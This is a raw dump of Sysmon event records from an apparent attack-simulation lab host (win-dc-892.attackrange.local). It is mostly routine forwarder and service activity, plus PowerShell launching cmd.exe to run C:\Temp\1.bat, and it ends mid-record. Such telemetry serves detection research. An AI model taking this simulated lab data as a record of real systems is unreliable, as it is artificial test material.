23542300x800000000000000010489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:31.275{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=272FBCD78C3EC0F9E80252FF70CEFB40,SHA256=1E75BECA21AAE8B55D54136670AC452D19B2695986F2735970CCEE595FDDB167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:31.056{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2A745496B3F999331D42539B4B4FD299,SHA256=E6CFD47F12534EF9BA9877BBE9593AB2608ADD2EEC5754293CF68AEBBE2FF45C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:32.400{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=10FD06EF5611D738DDAAD57850CBE8FE,SHA256=13597C276BD4FB8548DA2DD0879CE0347A21DFE48AD948626D2064681CF30B02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:32.306{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E297D6B025B8F48DE247462CBBA6DC4D,SHA256=167C506A851A73584347838CE65565BF4E72315E92605FA8FE56CD2C44F1CB48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:33.368{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B8C2C5C8237A6C1596E7530277C967F,SHA256=737C29FEFE4FAF5890111D526AB9BDF7808D17DD450018F56D92962AFD507BF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:34.681{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9A6685813F508DF518A1E5D5DC20473,SHA256=1A55F4F8E1938A99958AA855FA5272E5AF2CE0E3E2CB5AA4CF8483352FC68DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:34.431{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CD163CB7EAAD0F6CAD9FA18957429BB,SHA256=D4E0932B2A96C6A9155EBB7FA90A18C4AF88038EBBE6451421FD4625B41777B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:35.509{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=322066B75C11C6C132C9A39D95385515,SHA256=8392C930DF5792F8E87565132F60B743731BF940966EBC484CBEE5B1E114ABC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:35.538{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53700-false10.0.1.12-8000- 10341000x800000000000000010504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.571{266CAFBE-65AC-6064-5101-00000000AE01}55606832C:\Windows\system32\conhost.exe{266CAFBE-6644-6064-6701-00000000AE01}4524C:\Windows\SysWOW64\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.540{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=215643824F0409DC5CBFE4265D3A275D,SHA256=865C3EA3367541671A3F9B01461AEB131A4F6FD57D16445C6169F6C250CEB56F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:36.524{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.524{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:36.509{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.509{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:36.509{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6644-6064-6701-00000000AE01}4524C:\Windows\SysWOW64\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.509{266CAFBE-65AB-6064-5001-00000000AE01}24562612C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6644-6064-6701-00000000AE01}4524C:\Windows\SysWOW64\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+781c0|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+23cc02(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aaaa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aa39c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5d4219a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537afa3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537aca0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automat
ion.ni.dll+e5cb9293(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5344c0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5394e98(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537cd75(wow64) 154100x800000000000000010496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.520{266CAFBE-6644-6064-6701-00000000AE01}4524C:\Windows\SysWOW64\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat""C:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=0FEC5F30E705EADAEA5E9144F2FB12DC,SHA256=614CA7B627533E22AA3E5C3594605DC6FE6F000B0CC2B845ECE47CA60673EC7F,IMPHASH=B20DE9D5F257E3C5BDD2834F89FC042A{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000010507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:37.540{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C610C498DECEC987AF876B73F1E37A7,SHA256=4534D13A47AA130E25BF8BC470CDC36FCE7B427956CE41736A26831CDE54A7A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:37.509{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=200CC844A2E798C3F225D4206AA23867,SHA256=2E146C593F6CF75D79E2203B06B51DF8C43237F24EDB719B06BEF6E91214BCC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:38.680{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07B9A6C01B4F3F77892DC80C6AE96087,SHA256=DA380B00E98138D27456563A38E6AD21E26171C12C5D1E372766DB3C0A7635E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:39.712{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F87DCDE698731E7B7792A9CF43034E,SHA256=4F14F3CC821485F3CBF5E588D8A9EF0E66DD8A0C99D42CF09E9D767D1E96AE94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:40.790{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=56A67C67AADE4359BC16263E9819EA56,SHA256=D862AEC7EA53B17FC6AF42FEFA4D35D18EACE04BD8F87686B50930506C57988A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:40.743{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3997B275B4CB4E0956526DD0689C0174,SHA256=4E3DE5B1CCD37EF80C9AD50D73C31281238EEE7EEF39F2750078AF2808EF38C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:41.805{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC10ACD49093432600A06938F5D97AAC,SHA256=40573D67F1FED084E82B09C08F5B03805DC8A7260CE9129F740B53EC87F8097A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:42.805{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DF4E87F2580B5724E8276CA0F083F2D,SHA256=6682F67935ECF8B6AF8762C803D02546B679E21CDD674FCB5BF1CB8AFDABF57D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000010515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:43.852{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46135D75415169E8B0919FF1F3EDC0B8,SHA256=108FA214775284A42A0D6D244FD507E4409E2C3C25BD8454BE2E607ADB83C9E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:41.476{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53701-false10.0.1.12-8000- 23542300x800000000000000010518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:44.867{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0BF8B607D32BFFC9000FBE10D5D8912,SHA256=7DF5E0AAB9F0820A66337482F08FD82A0E6605A435D3C1C9BF91D9735ABF9F6A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:44.461{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x800000000000000010516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:44.461{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=DE6013F772D81F75E1233E7EBFB6600F,SHA256=0FCC9084066CA3925515E7D641985CEE8FE9FD5D03976B72378850A3D89C4746,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.898{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B97D020CD9D294E52ABEDA426B5D1012,SHA256=0B967A4579300DEF0ECECDABDED6DE68897FB855A1000F91BB0A7FA1B2AE4E11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
